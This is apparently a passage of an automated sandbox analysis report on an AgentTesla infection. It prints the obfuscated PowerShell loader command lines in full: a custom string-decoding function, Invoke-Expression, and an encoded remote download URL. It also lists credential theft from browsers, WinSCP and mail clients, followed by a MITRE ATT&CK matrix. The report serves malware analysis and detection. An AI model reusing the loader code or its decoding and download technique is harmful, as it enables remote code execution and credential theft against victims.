UnwoeKil.bcvibrihOpsplo.ibbe mic,o%daiquaHeroepGoldepUd,krdSteelatum.dtOustia A,ch%Brsli\ PorcM ShifeSinopr TykeoMythogSkorsaSkat sGastrt TrihrIntrau Pu.sl.iuntaCentr.DigamB autoeGrammsHouse Pid.l&Grumo&Und p Delfe Sst.cp,rtuhPigmeoFrt s Toppl$Objec ';Saprophagan (Pisseskn ' Punk$ Di ogSa valSlagbo S bubUnscaa fluelMisl.:OmbytAL.mbasQuee sIdioteUlempv JoureTimbrrNaadia.usiktNong.iOrgannIndbrg onti=U,ear(F attcVelsemStevedNe hu Eks m/OmskrcLetfr ota$ VentFKern.lSciopy .igtv ReleeS,less Snakt TradoU.bell FireecoelonTot.ee malt)Afspn ');Saprophagan (Pisseskn 'junke$ nsig AppalunderoepipabIsraea Lit.lpresu:ParitFGavend SyfirGra.ue vendnNonpreResidh ChanjHardme Bedrm Stil= Chil$ armu SponnPa.klsBagflh.edbia epowdBe,tsy.icla.Daa,esNringpUnexplOperci scat.ornb( drud$ ApolDGiftioObjekuDenatsT,efoePhr.tr UnoxsIndkr)Vel.o ');$unshady=$Fdrenehjem[0];Saprophagan (Pisseskn 'Nupti$De,meg .krol TakkoAl.opb Spe.aGelatlvarpn:SprreBunfelaEfteraSkoledPetrorunderuUndlitWor heSkakbnMicro=cilioN TraceNonf,wU hen-TradiO SalibInscrjA tikeU insc HeadtResta .gtesSBlo,kyUdlndsNonsutFjor.e.aukam Radi.,ysteNIlluveKupeettinkr.StatiWHjlpeeSnarebP.radCUr allHangoiHexace,phemn C litPensi ');Saprophagan (Pisseskn 'philo$triumB Bun a Unp.aSubagdFo,kerDah iu.ridntSengeeSkruenSched. B.rgHAnchye DuraarangsdPrivaelJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Merogastrula.Bes && echo $"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$enchodontoid = 1;$multinervate='substrin';$multinervate+='g';function pisseskn($parate){$nongelatinizing=$parate.length-$enchodontoid;for($agrestical=5; $agrestical -lt $nongelatinizing; $agrestical+=(6)){$dextranase88+=$parate.$multinervate.invoke($agrestical, $enchodontoid);}$dextranase88;}function saprophagan($factories){. ($laurikke) ($factories);}$hovedvrker=pisseskn 'addlems,steo .andzconfoi vejrl reavlprintab.une/ca,ro5.icit.choos0skide lnnin(duellw desiimonopnwap.kdsavanoislanwdoercs emer bromnuovertaxopo opri.1allia0forel.vaing0 comb;angre decorwgraeni femin g.in6kursu4ect,c;ko tr parenxtyede6tri,h4taffe;phary elle,r,uresv kipe:,eseg1hjemm2hjlpe1klogt. igne0prd k) hove altergdis aejonnhcstrafkf,rudopseud/ st,w2r vhu0digi.1,ecir0fersk0nakke1k.ass0 mese1 ield osphrfklon.ifemaarklebiebrontf s.tyoamtsrxborte/ fron1excla2butto1 publ.svesk0handl ';$nuanceret=pisseskn ' sdelurepansmedhoehe.lirpar a-el,vaaukasegpoca,emagtkn divvtiodat ';$unshady=pisseskn 'xylo.h rabbthalfhtmika,pt,lles ayyu: un,o/ inka/d.kkedbo edrdicari beravpl,caeco.pa.dem bg husnovelbeobann,ganno,ltandsedegne. swinc fel,orebanmdemou/endkkudieumcad oc?dag oes,rtlx sadapbhaktonond r udtrtg imr=tobacddefraocl.ngwvkke nweakalfulfioplatoafo.stdstorb&klbesipessudbatte=stv r1oneratsperme,elveimesmen re.tjskoleufidg.nstopne ,rstahimmeiabiol- talescontrrbes.iibarbo4 undec emibsuppl4freed0 dagdutartr9aeropk.elefrudsy,lexecu2travexcoemp7antirxhypoej mbeld,imelg reeng.orsc ';$dousers=pisseskn 't llb>reimm ';$laurikke=pisseskn 'afpluigrligedemorxluckf ';$flyvestolene = pisseskn ' unwoekil.bcvibrihopsplo.ibbe mic,o%daiquaheroepgoldepud,krdsteelatum.dtoustia a,ch%brsli\ porcm shifesinopr tykeomythogskorsaskat sgastrt trihrintrau pu.sl.iuntacentr.digamb autoegrammshouse pid.l&grumo&und p delfe sst.cp,rtuhpigmeofrt s toppl$objec ';saprophagan (pisseskn ' punk$ di ogsa valslagbo s bubunscaa fluelmisl.:ombytal.mbasquee sidioteulempv jouretimbrrnaadia.usiktnong.iorgannindbrg onti=u,ear(f attcvelsemstevedne hu eks m/omskrcletfr ota$ ventfkern.lsciopy .igtv relees,less snakt tradou.bell fireecoelontot.ee malt)afspn ');saprophagan (pisseskn 'junke$ nsig appalunderoepipabisraea lit.lpresu:paritfgavend syfirgra.ue vendnnonpreresidh chanjhardme bedrm stil= chil$ armu sponnpa.klsbagflh.edbia epowdbe,tsy.icla.daa,esnringpunexploperci scat.ornb( drud$ apoldgiftioobjekudenatst,efoephr.tr unoxsindkr)vel.o ');$unshady=$fdrenehjem[0];saprophagan (pisseskn 'nupti$de,meg .krol takkoal.opb spe.agelatlvarpn:sprrebunfelaefteraskoledpetrorunderuundlitwor heskakbnmicro=cilion tracenonf,wu hen-tradio salibinscrja tikeu insc headtresta .gtessblo,kyudlndsnonsutfjor.e.aukam radi.,ystenilluvekupeettinkr.statiwhjlpeesnarebp.radcur allhangoihexace,phemn c litpensi ');saprophagan (pisseskn 'philo$triumb bun a unp.asubagdfo,kerdah iu.ridntsengeeskruensched. b.rghanchye duraarangsdprivael
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$enchodontoid = 1;$multinervate='substrin';$multinervate+='g';function pisseskn($parate){$nongelatinizing=$parate.length-$enchodontoid;for($agrestical=5; $agrestical -lt $nongelatinizing; $agrestical+=(6)){$dextranase88+=$parate.$multinervate.invoke($agrestical, $enchodontoid);}$dextranase88;}function saprophagan($factories){. ($laurikke) ($factories);}$hovedvrker=pisseskn 'addlems,steo .andzconfoi vejrl reavlprintab.une/ca,ro5.icit.choos0skide lnnin(duellw desiimonopnwap.kdsavanoislanwdoercs emer bromnuovertaxopo opri.1allia0forel.vaing0 comb;angre decorwgraeni femin g.in6kursu4ect,c;ko tr parenxtyede6tri,h4taffe;phary elle,r,uresv kipe:,eseg1hjemm2hjlpe1klogt. igne0prd k) hove altergdis aejonnhcstrafkf,rudopseud/ st,w2r vhu0digi.1,ecir0fersk0nakke1k.ass0 mese1 ield osphrfklon.ifemaarklebiebrontf s.tyoamtsrxborte/ fron1excla2butto1 publ.svesk0handl ';$nuanceret=pisseskn ' sdelurepansmedhoehe.lirpar a-el,vaaukasegpoca,emagtkn divvtiodat ';$unshady=pisseskn 'xylo.h rabbthalfhtmika,pt,lles ayyu: un,o/ inka/d.kkedbo edrdicari beravpl,caeco.pa.dem bg husnovelbeobann,ganno,ltandsedegne. swinc fel,orebanmdemou/endkkudieumcad oc?dag oes,rtlx sadapbhaktonond r udtrtg imr=tobacddefraocl.ngwvkke nweakalfulfioplatoafo.stdstorb&klbesipessudbatte=stv r1oneratsperme,elveimesmen re.tjskoleufidg.nstopne ,rstahimmeiabiol- talescontrrbes.iibarbo4 undec emibsuppl4freed0 dagdutartr9aeropk.elefrudsy,lexecu2travexcoemp7antirxhypoej mbeld,imelg reeng.orsc ';$dousers=pisseskn 't llb>reimm ';$laurikke=pisseskn 'afpluigrligedemorxluckf ';$flyvestolene = pisseskn ' unwoekil.bcvibrihopsplo.ibbe mic,o%daiquaheroepgoldepud,krdsteelatum.dtoustia a,ch%brsli\ porcm shifesinopr tykeomythogskorsaskat sgastrt trihrintrau pu.sl.iuntacentr.digamb autoegrammshouse pid.l&grumo&und p delfe sst.cp,rtuhpigmeofrt s toppl$objec ';saprophagan (pisseskn ' punk$ di ogsa valslagbo s bubunscaa fluelmisl.:ombytal.mbasquee sidioteulempv jouretimbrrnaadia.usiktnong.iorgannindbrg onti=u,ear(f attcvelsemstevedne hu eks m/omskrcletfr ota$ ventfkern.lsciopy .igtv relees,less snakt tradou.bell fireecoelontot.ee malt)afspn ');saprophagan (pisseskn 'junke$ nsig appalunderoepipabisraea lit.lpresu:paritfgavend syfirgra.ue vendnnonpreresidh chanjhardme bedrm stil= chil$ armu sponnpa.klsbagflh.edbia epowdbe,tsy.icla.daa,esnringpunexploperci scat.ornb( drud$ apoldgiftioobjekudenatst,efoephr.tr unoxsindkr)vel.o ');$unshady=$fdrenehjem[0];saprophagan (pisseskn 'nupti$de,meg .krol takkoal.opb spe.agelatlvarpn:sprrebunfelaefteraskoledpetrorunderuundlitwor heskakbnmicro=cilion tracenonf,wu hen-tradio salibinscrja tikeu insc headtresta .gtessblo,kyudlndsnonsutfjor.e.aukam radi.,ystenilluvekupeettinkr.statiwhjlpeesnarebp.radcur allhangoihexace,phemn c litpensi ');saprophagan (pisseskn 'philo$triumb bun a unp.asubagdfo,kerdah iu.ridntsengeeskruensched. b.rghanchye duraarangsdprivael
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$enchodontoid = 1;$multinervate='substrin';$multinervate+='g';function pisseskn($parate){$nongelatinizing=$parate.length-$enchodontoid;for($agrestical=5; $agrestical -lt $nongelatinizing; $agrestical+=(6)){$dextranase88+=$parate.$multinervate.invoke($agrestical, $enchodontoid);}$dextranase88;}function saprophagan($factories){. ($laurikke) ($factories);}$hovedvrker=pisseskn 'addlems,steo .andzconfoi vejrl reavlprintab.une/ca,ro5.icit.choos0skide lnnin(duellw desiimonopnwap.kdsavanoislanwdoercs emer bromnuovertaxopo opri.1allia0forel.vaing0 comb;angre decorwgraeni femin g.in6kursu4ect,c;ko tr parenxtyede6tri,h4taffe;phary elle,r,uresv kipe:,eseg1hjemm2hjlpe1klogt. igne0prd k) hove altergdis aejonnhcstrafkf,rudopseud/ st,w2r vhu0digi.1,ecir0fersk0nakke1k.ass0 mese1 ield osphrfklon.ifemaarklebiebrontf s.tyoamtsrxborte/ fron1excla2butto1 publ.svesk0handl ';$nuanceret=pisseskn ' sdelurepansmedhoehe.lirpar a-el,vaaukasegpoca,emagtkn divvtiodat ';$unshady=pisseskn 'xylo.h rabbthalfhtmika,pt,lles ayyu: un,o/ inka/d.kkedbo edrdicari beravpl,caeco.pa.dem bg husnovelbeobann,ganno,ltandsedegne. swinc fel,orebanmdemou/endkkudieumcad oc?dag oes,rtlx sadapbhaktonond r udtrtg imr=tobacddefraocl.ngwvkke nweakalfulfioplatoafo.stdstorb&klbesipessudbatte=stv r1oneratsperme,elveimesmen re.tjskoleufidg.nstopne ,rstahimmeiabiol- talescontrrbes.iibarbo4 undec emibsuppl4freed0 dagdutartr9aeropk.elefrudsy,lexecu2travexcoemp7antirxhypoej mbeld,imelg reeng.orsc ';$dousers=pisseskn 't llb>reimm ';$laurikke=pisseskn 'afpluigrligedemorxluckf ';$flyvestolene = pisseskn ' unwoekil.bcvibrihopsplo.ibbe mic,o%daiquaheroepgoldepud,krdsteelatum.dtoustia a,ch%brsli\ porcm shifesinopr tykeomythogskorsaskat sgastrt trihrintrau pu.sl.iuntacentr.digamb autoegrammshouse pid.l&grumo&und p delfe sst.cp,rtuhpigmeofrt s toppl$objec ';saprophagan (pisseskn ' punk$ di ogsa valslagbo s bubunscaa fluelmisl.:ombytal.mbasquee sidioteulempv jouretimbrrnaadia.usiktnong.iorgannindbrg onti=u,ear(f attcvelsemstevedne hu eks m/omskrcletfr ota$ ventfkern.lsciopy .igtv relees,less snakt tradou.bell fireecoelontot.ee malt)afspn ');saprophagan (pisseskn 'junke$ nsig appalunderoepipabisraea lit.lpresu:paritfgavend syfirgra.ue vendnnonpreresidh chanjhardme bedrm stil= chil$ armu sponnpa.klsbagflh.edbia epowdbe,tsy.icla.daa,esnringpunexploperci scat.ornb( drud$ apoldgiftioobjekudenatst,efoephr.tr unoxsindkr)vel.o ');$unshady=$fdrenehjem[0];saprophagan (pisseskn 'nupti$de,meg .krol takkoal.opb spe.agelatlvarpn:sprrebunfelaefteraskoledpetrorunderuundlitwor heskakbnmicro=cilion tracenonf,wu hen-tradio salibinscrja tikeu insc headtresta .gtessblo,kyudlndsnonsutfjor.e.aukam radi.,ystenilluvekupeettinkr.statiwhjlpeesnarebp.radcur allhangoihexace,phemn c litpensi ');saprophagan (pisseskn 'philo$triumb bun a unp.asubagdfo,kerdah iu.ridntsengeeskruensched. b.rghanchye duraarangsdprivaelJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$enchodontoid = 1;$multinervate='substrin';$multinervate+='g';function pisseskn($parate){$nongelatinizing=$parate.length-$enchodontoid;for($agrestical=5; $agrestical -lt $nongelatinizing; $agrestical+=(6)){$dextranase88+=$parate.$multinervate.invoke($agrestical, $enchodontoid);}$dextranase88;}function saprophagan($factories){. ($laurikke) ($factories);}$hovedvrker=pisseskn 'addlems,steo .andzconfoi vejrl reavlprintab.une/ca,ro5.icit.choos0skide lnnin(duellw desiimonopnwap.kdsavanoislanwdoercs emer bromnuovertaxopo opri.1allia0forel.vaing0 comb;angre decorwgraeni femin g.in6kursu4ect,c;ko tr parenxtyede6tri,h4taffe;phary elle,r,uresv kipe:,eseg1hjemm2hjlpe1klogt. igne0prd k) hove altergdis aejonnhcstrafkf,rudopseud/ st,w2r vhu0digi.1,ecir0fersk0nakke1k.ass0 mese1 ield osphrfklon.ifemaarklebiebrontf s.tyoamtsrxborte/ fron1excla2butto1 publ.svesk0handl ';$nuanceret=pisseskn ' sdelurepansmedhoehe.lirpar a-el,vaaukasegpoca,emagtkn divvtiodat ';$unshady=pisseskn 'xylo.h rabbthalfhtmika,pt,lles ayyu: un,o/ inka/d.kkedbo edrdicari beravpl,caeco.pa.dem bg husnovelbeobann,ganno,ltandsedegne. swinc fel,orebanmdemou/endkkudieumcad oc?dag oes,rtlx sadapbhaktonond r udtrtg imr=tobacddefraocl.ngwvkke nweakalfulfioplatoafo.stdstorb&klbesipessudbatte=stv r1oneratsperme,elveimesmen re.tjskoleufidg.nstopne ,rstahimmeiabiol- talescontrrbes.iibarbo4 undec emibsuppl4freed0 dagdutartr9aeropk.elefrudsy,lexecu2travexcoemp7antirxhypoej mbeld,imelg reeng.orsc ';$dousers=pisseskn 't llb>reimm ';$laurikke=pisseskn 'afpluigrligedemorxluckf ';$flyvestolene = pisseskn ' unwoekil.bcvibrihopsplo.ibbe mic,o%daiquaheroepgoldepud,krdsteelatum.dtoustia a,ch%brsli\ porcm shifesinopr tykeomythogskorsaskat sgastrt trihrintrau pu.sl.iuntacentr.digamb autoegrammshouse pid.l&grumo&und p delfe sst.cp,rtuhpigmeofrt s toppl$objec ';saprophagan (pisseskn ' punk$ di ogsa valslagbo s bubunscaa fluelmisl.:ombytal.mbasquee sidioteulempv jouretimbrrnaadia.usiktnong.iorgannindbrg onti=u,ear(f attcvelsemstevedne hu eks m/omskrcletfr ota$ ventfkern.lsciopy .igtv relees,less snakt tradou.bell fireecoelontot.ee malt)afspn ');saprophagan (pisseskn 'junke$ nsig appalunderoepipabisraea lit.lpresu:paritfgavend syfirgra.ue vendnnonpreresidh chanjhardme bedrm stil= chil$ armu sponnpa.klsbagflh.edbia epowdbe,tsy.icla.daa,esnringpunexploperci scat.ornb( drud$ apoldgiftioobjekudenatst,efoephr.tr unoxsindkr)vel.o ');$unshady=$fdrenehjem[0];saprophagan (pisseskn 'nupti$de,meg .krol takkoal.opb spe.agelatlvarpn:sprrebunfelaefteraskoledpetrorunderuundlitwor heskakbnmicro=cilion tracenonf,wu hen-tradio salibinscrja tikeu insc headtresta .gtessblo,kyudlndsnonsutfjor.e.aukam radi.,ystenilluvekupeettinkr.statiwhjlpeesnarebp.radcur allhangoihexace,phemn c litpensi ');saprophagan (pisseskn 'philo$triumb bun a unp.asubagdfo,kerdah iu.ridntsengeeskruensched. b.rghanchye duraarangsdprivaelJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Program Files (x86)\Windows Mail\wab.exe VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeCode function: 12_2_00383675 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,12_2_00383675
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected AgentTesla
            Source: Yara matchFile source: 0000000A.00000002.3362357592.00000000245A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.3362357592.0000000024551000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
            Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
            Source: Yara matchFile source: 0000000A.00000002.3362357592.0000000024551000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

            Remote Access Functionality

            barindex
            Yara detected AgentTesla
            Source: Yara matchFile source: 0000000A.00000002.3362357592.00000000245A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.3362357592.0000000024551000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information221
            Scripting            		Valid Accounts121
            Windows Management Instrumentation            		221
            Scripting            		1
            DLL Side-Loading            		1
            Disable or Modify Tools            		1
            OS Credential Dumping            		1
            System Time Discovery            		Remote Services1
            Archive Collected Data            		1
            Ingress Tool Transfer            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Exploitation for Client Execution            		1
            DLL Side-Loading            		111
            Process Injection            		2
            Obfuscated Files or Information            		1
            Credentials in Registry            		1
            File and Directory Discovery            		Remote Desktop Protocol1
            Data from Local System            		11
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts112
            Command and Scripting Interpreter            		1
            Registry Run Keys / Startup Folder            		1
            Registry Run Keys / Startup Folder            		1
            Software Packing            		Security Account Manager25
            System Information Discovery            		SMB/Windows Admin Shares1
            Email Collection            		1
            Non-Standard Port            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal Accounts2
            PowerShell            		Login HookLogin Hook1
            Timestomp            		NTDS1
            Query Registry            		Distributed Component Object ModelInput Capture2
            Non-Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            DLL Side-Loading            		LSA Secrets331
            Security Software Discovery            		SSHKeylogging13
            Application Layer Protocol            		Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Masquerading            		Cached Domain Credentials1
            Process Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items151
            Virtualization/Sandbox Evasion            		DCSync151
            Virtualization/Sandbox Evasion            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job111
            Process Injection            		Proc Filesystem1
            Application Window Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
